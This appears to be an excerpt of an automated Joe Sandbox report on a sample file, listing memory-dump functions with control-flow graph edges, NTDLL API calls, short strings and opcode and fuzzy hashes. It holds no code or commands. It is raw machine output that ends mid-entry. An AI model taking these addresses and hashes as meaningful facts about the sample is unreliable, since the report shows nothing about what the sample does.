                                                              • Opcode ID: d26438dc5002ad86c80ed2db3c9e53c97f48853112d21a200d4aaad7c02bf953
                                                              • Instruction ID: 38120b0f60f9bb876b7d5d82e4b615f32424c29d73cce8abfddee1261cd80335
                                                              • Opcode Fuzzy Hash: d26438dc5002ad86c80ed2db3c9e53c97f48853112d21a200d4aaad7c02bf953
                                                              • Instruction Fuzzy Hash: F591B031B002149FDB04DF79C455BAEBBF6EF89710F2481A9E906DB3A1DA74DD428B90
                                                              Function 05185311 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 117 5185311-5185318 118 5185388 117->118 119 518531a-518537f 117->119 121 5185389-51853b7 KiUserCallbackDispatcher 118->121 119->118 122 51853b9-51853bf 121->122 123 51853c0-51853e6 121->123 122->123
                                                              APIs
                                                              • KiUserCallbackDispatcher.NTDLL(00000050), ref: 051853A3
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3837220203.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5180000_vYz1Z2heor.jbxd
                                                              Similarity
                                                              • API ID: CallbackDispatcherUser
                                                              • String ID: 4'q
                                                              • API String ID: 2492992576-1807707664
                                                              • Opcode ID: bd2542951e1d7aac4644642a7ca54a90b07a6dd951ec6f1c6e10a3dbca3baf0b
                                                              • Instruction ID: 6c0bedb81226f9760879aef9fc423fe3713ef566ec8db13c46bd1d54446d6b7a
                                                              • Opcode Fuzzy Hash: bd2542951e1d7aac4644642a7ca54a90b07a6dd951ec6f1c6e10a3dbca3baf0b
                                                              • Instruction Fuzzy Hash: 152198B1D043598FCB24DFA9D841BEEBBB4FB08320F14811AE815B7280C778A945CFA5
                                                              Function 05185320 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 56COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 129 5185320-51853b7 KiUserCallbackDispatcher 135 51853b9-51853bf 129->135 136 51853c0-51853e6 129->136 135->136
                                                              APIs
                                                              • KiUserCallbackDispatcher.NTDLL(00000050), ref: 051853A3
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3837220203.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5180000_vYz1Z2heor.jbxd
                                                              Similarity
                                                              • API ID: CallbackDispatcherUser
                                                              • String ID: 4'q
                                                              • API String ID: 2492992576-1807707664
                                                              • Opcode ID: bf67d0e504a3a2e9e1d9df9cb05b17d14d1f35a98c00da6ec6355d3156a0d7a9
                                                              • Instruction ID: 3fca8f296c61ce5f7826f4daa0c1efa1c5526e5366a974b18e5aadeb306fa67f
                                                              • Opcode Fuzzy Hash: bf67d0e504a3a2e9e1d9df9cb05b17d14d1f35a98c00da6ec6355d3156a0d7a9
                                                              • Instruction Fuzzy Hash: 992137B1D043598FCB20DF99D545BEEBBB4FB08320F14811AE819B7240C7746945CFA5
                                                              Function 00C16DA0 Relevance: 2.7, Strings: 2, Instructions: 232COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 139 c16da0-c16db6 140 c16ef4-c16f19 139->140 141 c16dbc-c16dbe 139->141 142 c16f20-c16f6b 140->142 141->142 143 c16dc4-c16dd2 141->143 164 c16fcd-c16fd2 142->164 165 c16f6d-c16f76 142->165 148 c16e05-c16e13 143->148 149 c16dd4-c16ddc 143->149 156 c16e15-c16e1d 148->156 157 c16e5a-c16e68 148->157 151 c16dea-c16e02 149->151 152 c16dde-c16de0 149->152 152->151 159 c16e2b-c16e57 156->159 160 c16e1f-c16e21 156->160 166 c16e6a-c16e72 157->166 167 c16eaf-c16eb7 157->167 160->159 169 c16fc3-c16fc7 165->169 170 c16f78-c16f7b 165->170 173 c16e80-c16eac 166->173 174 c16e74-c16e76 166->174 171 c16ec5-c16ef1 167->171 172 c16eb9-c16ebb 167->172 169->164 176 c16fd3-c1701d 170->176 177 c16f7d-c16f8a 170->177 172->171 174->173 178 c16f9a-c16fa2 177->178 179 c16f8c-c16f98 177->179 185 c16fa7-c16fb7 178->185 179->178 190 c16fb8-c16fc1 179->190 190->169 190->170
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3833775078.0000000000C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_c10000_vYz1Z2heor.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: (q$(q
                                                              • API String ID: 0-2485164810
                                                              • Opcode ID: 900054cd2a90eed345e53432dcc1424aad73062eec49e657dd86588fa7847c9a
                                                              • Instruction ID: 1d22e3a624b0883ae42040b3829dc74f91d6e8fdb204336cc4892277ef02f296
                                                              • Opcode Fuzzy Hash: 900054cd2a90eed345e53432dcc1424aad73062eec49e657dd86588fa7847c9a
                                                              • Instruction Fuzzy Hash: 8471C1317043404FDB19DF69E890A9EBBE6AFC625031485BEE805CB396DA70ED46C7A1
                                                              Function 00C160FC Relevance: 2.7, Strings: 2, Instructions: 182COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 246 c160fc-c16194 249 c16196-c161a1 246->249 250 c161de-c161e0 246->250 249->250 252 c161a3-c161af 249->252 251 c161e2-c161fa 250->251 259 c16244-c16246 251->259 260 c161fc-c16207 251->260 253 c161b1-c161bb 252->253 254 c161d2-c161dc 252->254 255 c161bd 253->255 256 c161bf-c161ce 253->256 254->251 255->256 256->256 258 c161d0 256->258 258->254 261 c16248-c1625a 259->261 260->259 262 c16209-c16215 260->262 269 c16261-c1628d 261->269 263 c16217-c16221 262->263 264 c16238-c16242 262->264 266 c16223 263->266 267 c16225-c16234 263->267 264->261 266->267 267->267 268 c16236 267->268 268->264 270 c16293-c162a1 269->270 271 c162a3-c162a9 270->271 272 c162aa-c16307 270->272 271->272 279 c16317-c1631b 272->279 280 c16309-c1630d 272->280 282 c1632b-c1632f 279->282 283 c1631d-c16321 279->283 280->279 281 c1630f-c16312 call c10c34 280->281 281->279 286 c16331-c16335 282->286 287 c1633f-c16343 282->287 283->282 285 c16323-c16326 call c10c34 283->285 285->282 286->287 289 c16337 286->289 290 c16353 287->290 291 c16345-c16349 287->291 289->287 293 c16354 290->293 291->290 292 c1634b 291->292 292->290 293->293
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3833775078.0000000000C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_c10000_vYz1Z2heor.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: \V^m$\V^m
                                                              • API String ID: 0-3963016192
                                                              • Opcode ID: 4d76b5ecb0b1d5a01203ba5ca8a3573421dfe88caf71fb789aad86b44060a32d
                                                              • Instruction ID: 59c96088a6cc96fbbd50bdb9188e79d92650b6801ccee797eee5df695828467f
                                                              • Opcode Fuzzy Hash: 4d76b5ecb0b1d5a01203ba5ca8a3573421dfe88caf71fb789aad86b44060a32d
                                                              • Instruction Fuzzy Hash: A7715CB0E00209DFDF14CFA9C8857DEBBF1AF89314F148129E465AB254DB749982DB91
                                                              Function 00C16108 Relevance: 2.7, Strings: 2, Instructions: 180COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 294 c16108-c16194 297 c16196-c161a1 294->297 298 c161de-c161e0 294->298 297->298 300 c161a3-c161af 297->300 299 c161e2-c161fa 298->299 307 c16244-c16246 299->307 308 c161fc-c16207 299->308 301 c161b1-c161bb 300->301 302 c161d2-c161dc 300->302 303 c161bd 301->303 304 c161bf-c161ce 301->304 302->299 303->304 304->304 306 c161d0 304->306 306->302 309 c16248-c1628d 307->309 308->307 310 c16209-c16215 308->310 318 c16293-c162a1 309->318 311 c16217-c16221 310->311 312 c16238-c16242 310->312 314 c16223 311->314 315 c16225-c16234 311->315 312->309 314->315 315->315 316 c16236 315->316 316->312 319 c162a3-c162a9 318->319 320 c162aa-c16307 318->320 319->320 327 c16317-c1631b 320->327 328 c16309-c1630d 320->328 330 c1632b-c1632f 327->330 331 c1631d-c16321 327->331 328->327 329 c1630f-c16312 call c10c34 328->329 329->327 334 c16331-c16335 330->334 335 c1633f-c16343 330->335 331->330 333 c16323-c16326 call c10c34 331->333 333->330 334->335 337 c16337 334->337 338 c16353 335->338 339 c16345-c16349 335->339 337->335 341 c16354 338->341 339->338 340 c1634b 339->340 340->338 341->341
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3833775078.0000000000C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_c10000_vYz1Z2heor.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: \V^m$\V^m
                                                              • API String ID: 0-3963016192
                                                              • Opcode ID: 4438f8b88b349e976ecfda3b09e1e23b5c081a4b8302b6f9b4d7a6cc77e05bc1
                                                              • Instruction ID: 95d5cc9e2c30758760f499b713daeb81daf0f755aa76fde2bffc98cb2857cb8a
                                                              • Opcode Fuzzy Hash: 4438f8b88b349e976ecfda3b09e1e23b5c081a4b8302b6f9b4d7a6cc77e05bc1
                                                              • Instruction Fuzzy Hash: C7714EB0E00209DFDF14DFA9C8857DEBBF2BF89314F148129D425AB254EB749982DB91
                                                              Function 00C11750 Relevance: 2.6, Strings: 2, Instructions: 148COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 342 c11750-c1175d 343 c11701-c11715 342->343 344 c1175f-c1177f 342->344 347 c11717-c11732 343->347 348 c116b9 343->348 345 c11785-c117f7 call c10af8 344->345 346 c11a2a-c11a65 344->346 387 c117fd-c11874 345->387 368 c11a67-c11a8b 346->368 369 c11a09-c11a20 346->369 425 c11734 call c11750 347->425 426 c11734 call c11760 347->426 349 c116c4-c11715 348->349 350 c116bb 348->350 349->347 349->348 350->349 362 c1173a-c1174a 372 c11ab6-c11abf 368->372 374 c11ac1-c11ac7 372->374 375 c11a8d-c11a96 372->375 377 c11a98-c11aa6 375->377 378 c11aca-c11bad call c10b34 375->378 377->378 379 c11aa8-c11aac 377->379 427 c11baf call c11bd0 378->427 428 c11baf call c11be0 378->428 381 c11ab3 379->381 382 c11aae-c11ab0 379->382 381->372 382->381 406 c11876-c11889 387->406 407 c1188b-c118af 387->407 408 c118b6-c118ba 406->408 407->408 411 c118c5-c118c6 408->411 412 c118bc 408->412 411->369 412->411 423 c11bb5-c11bcd 425->362 426->362 427->423 428->423
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3833775078.0000000000C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_c10000_vYz1Z2heor.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Teq$dOt
                                                              • API String ID: 0-2859403557
                                                              • Opcode ID: b7eab75bfbaf8fc17cdbdb7ccef315b326d0af75701dfc9c7e649e79e7ecfe85
                                                              • Instruction ID: 144524e11b321b98f892429b0533f6b5c44dfc9baa4e26c666170e49ff54147d
                                                              • Opcode Fuzzy Hash: b7eab75bfbaf8fc17cdbdb7ccef315b326d0af75701dfc9c7e649e79e7ecfe85
                                                              • Instruction Fuzzy Hash: E0518235B102109FCB08DF39D459A9EBBF6EF89710B1581A9E806DB7B2CA75DC05CB90
                                                              Function 00C1CB98 Relevance: 1.8, Strings: 1, Instructions: 531COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 429 c1cb98-c1cbb9 430 c1cbc7-c1cbcb 429->430 431 c1cbbb-c1cbbf 429->431 432 c1cbd1-c1cbd4 430->432 433 c1d22a 430->433 431->433 434 c1cbc5 431->434 435 c1cbda-c1cbe2 432->435 436 c1d22f-c1d234 432->436 433->436 434->432 437 c1cbf2-c1cc0e call c1cab8 435->437 438 c1cbe4-c1cbe7 435->438 444 c1d239-c1d240 436->444 447 c1cc10-c1cc26 call c1cab8 437->447 448 c1cc8b-c1ccb7 call c1cab8 437->448 441 c1cbed 438->441 442 c1ccbc-c1cce0 call c1cab8 438->442 441->444 449 c1cce2-c1ccfb 442->449 450 c1ccfd-c1cd0b 442->450 458 c1cc58-c1cc7d call c1cab8 447->458 459 c1cc28-c1cc2c 447->459 448->444 461 c1cd35-c1cd47 449->461 450->433 453 c1cd11-c1cd13 450->453 453->433 457 c1cd19-c1cd1b 453->457 457->433 462 c1cd21-c1cd2d 457->462 480 c1cc85-c1cc89 458->480 459->458 463 c1cc2e-c1cc4e call c1cab8 459->463 467 c1cd59-c1cd76 call c1cab8 461->467 468 c1cd49 461->468 462->461 481 c1cc56 463->481 476 c1cd78-c1cd7c 467->476 477 c1cd7e-c1cd8d 467->477 468->444 472 c1cd4f-c1cd53 468->472 472->444 472->467 476->477 479 c1cd90-c1ce22 476->479 477->479 489 c1ce25-c1ce4d 479->489 480->447 480->448 481->480 489->436 492 c1ce53-c1ce71 489->492 493 c1ce73 492->493 494 c1ce7a-c1ce83 492->494 495 c1ced5-c1cee6 493->495 496 c1ce75-c1ce78 493->496 497 c1ce85-c1ceab 494->497 498 c1cead-c1ced3 494->498 499 c1cef4-c1cef8 495->499 500 c1cee8-c1ceec 495->500 496->494 496->495 505 c1cf16-c1cf1f 497->505 498->505 499->433 503 c1cefe-c1cf01 499->503 500->433 502 c1cef2 500->502 502->503 503->436 506 c1cf07-c1cf0f 503->506 505->436 507 c1cf25-c1cf3a 505->507 506->505 507->489 508 c1cf40-c1cf44 507->508 509 c1cf46-c1cf4a 508->509 510 c1cf4c-c1cf50 508->510 509->510 511 c1cf60-c1cf64 509->511 512 c1d087-c1d093 510->512 513 c1cf56-c1cf5a 510->513 514 c1cfc5-c1cfc9 511->514 515 c1cf66-c1cf6a 511->515 512->436 516 c1d099-c1d0aa 512->516 513->511 513->512 519 c1d027-c1d02b 514->519 520 c1cfcb-c1cfcf 514->520 515->514 517 c1cf6c-c1cf78 515->517 516->436 518 c1d0b0-c1d0b7 516->518 517->436 521 c1cf7e-c1cf99 517->521 518->436 522 c1d0bd-c1d0c4 518->522 519->512 523 c1d02d-c1d031 519->523 520->519 524 c1cfd1-c1cfdd 520->524 521->436 532 c1cf9f-c1cfa7 521->532 522->436 525 c1d0ca-c1d0d1 522->525 523->512 526 c1d033-c1d03f 523->526 524->436 527 c1cfe3-c1cffe 524->527 525->436 529 c1d0d7-c1d0ea call c1cab8 525->529 526->436 530 c1d045-c1d060 526->530 527->436 534 c1d004-c1d00c 527->534 539 c1d14a-c1d14e 529->539 540 c1d0ec-c1d0f0 529->540 530->436 541 c1d066-c1d06e 530->541 532->436 535 c1cfad-c1cfc0 532->535 534->436 538 c1d012-c1d025 534->538 535->512 538->512 542 c1d150-c1d154 539->542 543 c1d1ab-c1d1af 539->543 540->539 545 c1d0f2-c1d0fe 540->545 541->436 546 c1d074-c1d07f 541->546 542->543 550 c1d156-c1d162 542->550 547 c1d1b1-c1d1b5 543->547 548 c1d202-c1d217 543->548 545->436 551 c1d104-c1d12c 545->551 546->512 547->548 553 c1d1b7-c1d1c3 547->553 555 c1d219 548->555 556 c1d228 548->556 550->436 554 c1d168-c1d190 550->554 551->436 563 c1d132-c1d145 551->563 553->436 558 c1d1c5-c1d1ed 553->558 554->436 565 c1d196-c1d1a9 554->565 555->467 560 c1d21f-c1d222 555->560 556->444 558->436 567 c1d1ef-c1d1fa 558->567 560->467 560->556 563->548 565->548 567->548
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3833775078.0000000000C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_c10000_vYz1Z2heor.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: d
                                                              • API String ID: 0-2564639436
                                                              • Opcode ID: a37b65af347b43d407cf43ea5cdb7c4ba75cf74b97ab8f5e2fa9d3b1bc373877
                                                              • Instruction ID: e9b40fa9013781e10dd0d62fa45a172d4b432d71ea1746592396fc92d3ab9f72
                                                              • Opcode Fuzzy Hash: a37b65af347b43d407cf43ea5cdb7c4ba75cf74b97ab8f5e2fa9d3b1bc373877
                                                              • Instruction Fuzzy Hash: 08324671A00609DFDB24CF69C884B9DFBB2FF99304F248629E4269B615D730ED95DB80
                                                              Function 05180B1F Relevance: 1.6, APIs: 1, Instructions: 65libraryCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 572 5180b1f-5180b5b 575 5180b62-5180b75 LdrInitializeThunk 572->575 576 5180b7c-5180b83 575->576 577 5180bcb-5180be4 576->577 578 5180b85-5180bb9 576->578 581 5180bef 577->581 582 5180be6 577->582 578->577 587 5180bbb-5180bc5 578->587 583 5180bf0 581->583 582->581 583->583 587->577
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3837220203.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5180000_vYz1Z2heor.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: fcf81e3c3b3df1e741a21fd9e69213380db800cf65c146e463418f9b841d52f5
                                                              • Instruction ID: 3cbd8c73150cfd6b275576bf862014450914d46162377f21b52c7250c15de1c4
                                                              • Opcode Fuzzy Hash: fcf81e3c3b3df1e741a21fd9e69213380db800cf65c146e463418f9b841d52f5
                                                              • Instruction Fuzzy Hash: 84214F357006188FC768EB68C594BAE37F2AB8E305F240479D406A7369DB719D86EB90
                                                              Function 00C15AB4 Relevance: 1.5, Strings: 1, Instructions: 276COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 685 c15ab4-c15b26 687 c15b70-c15b72 685->687 688 c15b28-c15b33 685->688 690 c15b74-c15b8d 687->690 688->687 689 c15b35-c15b41 688->689 691 c15b43-c15b4d 689->691 692 c15b64-c15b6e 689->692 697 c15bd9-c15bdb 690->697 698 c15b8f-c15b9b 690->698 693 c15b51-c15b60 691->693 694 c15b4f 691->694 692->690 693->693 696 c15b62 693->696 694->693 696->692 700 c15bdd-c15c35 697->700 698->697 699 c15b9d-c15ba9 698->699 701 c15bab-c15bb5 699->701 702 c15bcc-c15bd7 699->702 709 c15c37-c15c42 700->709 710 c15c7f-c15c81 700->710 703 c15bb7 701->703 704 c15bb9-c15bc8 701->704 702->700 703->704 704->704 706 c15bca 704->706 706->702 709->710 712 c15c44-c15c50 709->712 711 c15c83-c15c9b 710->711 719 c15ce5-c15ce7 711->719 720 c15c9d-c15ca8 711->720 713 c15c73-c15c7d 712->713 714 c15c52-c15c5c 712->714 713->711 715 c15c60-c15c6f 714->715 716 c15c5e 714->716 715->715 718 c15c71 715->718 716->715 718->713 721 c15ce9-c15cfb 719->721 720->719 722 c15caa-c15cb6 720->722 729 c15d02-c15d3a 721->729 723 c15cd9-c15ce3 722->723 724 c15cb8-c15cc2 722->724 723->721 726 c15cc4 724->726 727 c15cc6-c15cd5 724->727 726->727 727->727 728 c15cd7 727->728 728->723 730 c15d40-c15d4e 729->730 731 c15d50-c15d56 730->731 732 c15d57-c15db7 730->732 731->732 739 c15dc7-c15dcb 732->739 740 c15db9-c15dbd 732->740 742 c15ddb-c15ddf 739->742 743 c15dcd-c15dd1 739->743 740->739 741 c15dbf 740->741 741->739 745 c15de1-c15de5 742->745 746 c15def-c15df3 742->746 743->742 744 c15dd3 743->744 744->742 745->746 749 c15de7-c15dea call c10c34 745->749 747 c15e03-c15e07 746->747 748 c15df5-c15df9 746->748 751 c15e17-c15e1b 747->751 752 c15e09-c15e0d 747->752 748->747 750 c15dfb-c15dfe call c10c34 748->750 749->746 750->747 756 c15e2b-c15e2f 751->756 757 c15e1d-c15e21 751->757 752->751 755 c15e0f-c15e12 call c10c34 752->755 755->751 760 c15e31-c15e35 756->760 761 c15e3f 756->761 757->756 759 c15e23 757->759 759->756 760->761 762 c15e37 760->762 763 c15e40 761->763 762->761 763->763
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3833775078.0000000000C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_c10000_vYz1Z2heor.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: \V^m
                                                              • API String ID: 0-3751104571
                                                              • Opcode ID: dc9023645cdfe7170cc9a7b7ecba06145779e222736d456f0918177050e3c944
                                                              • Instruction ID: 8f4adf960b05ab113b0c697074b0281d21a7911d0a46402108c8810520c80f77
                                                              • Opcode Fuzzy Hash: dc9023645cdfe7170cc9a7b7ecba06145779e222736d456f0918177050e3c944
                                                              • Instruction Fuzzy Hash: 6EB18E70E00609CFDB10DFA9D9857DDBBF2BF89304F248129D425AB294EB749982DF91
                                                              Function 05180A6A Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 764 5180a6a-5180a72 765 5180a7d-5180a80 764->765 766 5180a90-5180a93 764->766 767 5180aa9-5180aae 765->767 768 5180a82-5180a8f KiUserExceptionDispatcher 765->768 766->765 769 5180a95-5180a9c 766->769 771 5180ab3-5180ab9 767->771 768->766 770 5180a9e 769->770 769->771 773 5180aa7 770->773 773->771
                                                              APIs
                                                              • KiUserExceptionDispatcher.NTDLL ref: 05180A89
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3837220203.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5180000_vYz1Z2heor.jbxd
                                                              Similarity
                                                              • API ID: DispatcherExceptionUser
                                                              • String ID:
                                                              • API String ID: 6842923-0
                                                              • Opcode ID: 8527c5179e8907943a27086da4d872612a1a02eee6f77067a8b6ca6af1b7e5a3
                                                              • Instruction ID: 1530ea11e308466fb3ed473c747aa953eddc51828df6c091a1e61dd029fc9153
                                                              • Opcode Fuzzy Hash: 8527c5179e8907943a27086da4d872612a1a02eee6f77067a8b6ca6af1b7e5a3
                                                              • Instruction Fuzzy Hash: CCE0393A901928DFDB35EB98E969ABCF331FB88721B028161C052135508730689BCFC5
                                                              Function 05180A7C Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • KiUserExceptionDispatcher.NTDLL ref: 05180A89
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3837220203.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5180000_vYz1Z2heor.jbxd
                                                              Similarity
                                                              • API ID: DispatcherExceptionUser
                                                              • String ID:
                                                              • API String ID: 6842923-0
                                                              • Opcode ID: 0779c7b4ba6f88ffa65d56df6b9f162341d48a2363dea28cb6ba6d103790fe6c
                                                              • Instruction ID: 4559d1107fd3ce6745678a934a3c645244c0c89340efc51d9e05cf2306cbc74e
                                                              • Opcode Fuzzy Hash: 0779c7b4ba6f88ffa65d56df6b9f162341d48a2363dea28cb6ba6d103790fe6c
                                                              • Instruction Fuzzy Hash: 9CE09A36911928DBCB25EB88E9686BCB771FB88311F018565D45653554C7306897CF84
                                                              Function 00C17020 Relevance: 1.4, Strings: 1, Instructions: 138COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3833775078.0000000000C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_c10000_vYz1Z2heor.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Teq
                                                              • API String ID: 0-1098410595
                                                              • Opcode ID: 9d34d3ce4c71512126b61de0bc3f6daea7e4d8e664b6bd611f1461d2b82d2774
                                                              • Instruction ID: 6585a2897e1186d68b38af199d84335f051d6a9f7719974ede3e20629999ea55
                                                              • Opcode Fuzzy Hash: 9d34d3ce4c71512126b61de0bc3f6daea7e4d8e664b6bd611f1461d2b82d2774
                                                              • Instruction Fuzzy Hash: 45512274B101049FCB44DF69C898AADBBF6FF89714B2540A9E506DB3B2CA71EC419B80
                                                              Function 00C17030 Relevance: 1.4, Strings: 1, Instructions: 132COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3833775078.0000000000C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_c10000_vYz1Z2heor.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Teq
                                                              • API String ID: 0-1098410595
                                                              • Opcode ID: 117a358dc3eeed3627be04fea8ce9f41f2a54186de8b2cb09d88e4e02479378b
                                                              • Instruction ID: 18944ceb31c899136eba4bfbca1d8054aaac98c1dd874bc9eacd5fee9a938b24
                                                              • Opcode Fuzzy Hash: 117a358dc3eeed3627be04fea8ce9f41f2a54186de8b2cb09d88e4e02479378b
                                                              • Instruction Fuzzy Hash: 78512275B102149FCB44DF69C898A9DBBF6FF89710F2540A9E406DB3B1DA71EC419B80
                                                              Function 00C18651 Relevance: 1.4, Strings: 1, Instructions: 132COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3833775078.0000000000C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_c10000_vYz1Z2heor.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: K
                                                              • API String ID: 0-2299363055
                                                              • Opcode ID: eb40a95ed9b405415553e26943b2174090c8c67f8ded0f93cdabd93c3a0313cd
                                                              • Instruction ID: 100a5726e0cf0230230029e0c7f1ec253594c489ad0d2e19ad8a03bb76228d7b
                                                              • Opcode Fuzzy Hash: eb40a95ed9b405415553e26943b2174090c8c67f8ded0f93cdabd93c3a0313cd
                                                              • Instruction Fuzzy Hash: A451B171A046488FCB15DF69C550ADEBBF2FF89304B208529E416AB355DF70ED86DB80
                                                              Function 00C115B8 Relevance: 1.4, Strings: 1, Instructions: 131COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3833775078.0000000000C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_c10000_vYz1Z2heor.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Hq
                                                              • API String ID: 0-1594803414
                                                              • Opcode ID: ffefc162c9505414c622fa530525971ae259770f5a0fde40326d80336af99377
                                                              • Instruction ID: 175c823f2b1e7212a14afc09134501d0820bfe56d3ca5e5e6f09ebaa20ee7aac
                                                              • Opcode Fuzzy Hash: ffefc162c9505414c622fa530525971ae259770f5a0fde40326d80336af99377
                                                              • Instruction Fuzzy Hash: 4841F331B042048FCB05DF69C454BAEBBF2EF89300F1885A9E506DB362CA75DD45CB51
                                                              Function 00C18660 Relevance: 1.4, Strings: 1, Instructions: 126COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3833775078.0000000000C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_c10000_vYz1Z2heor.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: K
                                                              • API String ID: 0-2299363055
                                                              • Opcode ID: 03f9d24182cd2430a13616cc8257e0b34e03e8290b2bd0a9996bbb2aa05f9e38
                                                              • Instruction ID: ccc42e110bbb722f08ea28604b033fef0c3065356cc0efaf0a9c548ebf724e94
                                                              • Opcode Fuzzy Hash: 03f9d24182cd2430a13616cc8257e0b34e03e8290b2bd0a9996bbb2aa05f9e38
                                                              • Instruction Fuzzy Hash: 54419171A047088FCB15DF69C550A9EBBF2FF89344B208529E416AB355DF70ED86DB80
                                                              Function 00C11BD0 Relevance: 1.3, Strings: 1, Instructions: 95COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3833775078.0000000000C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_c10000_vYz1Z2heor.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: LRq
                                                              • API String ID: 0-3187445251
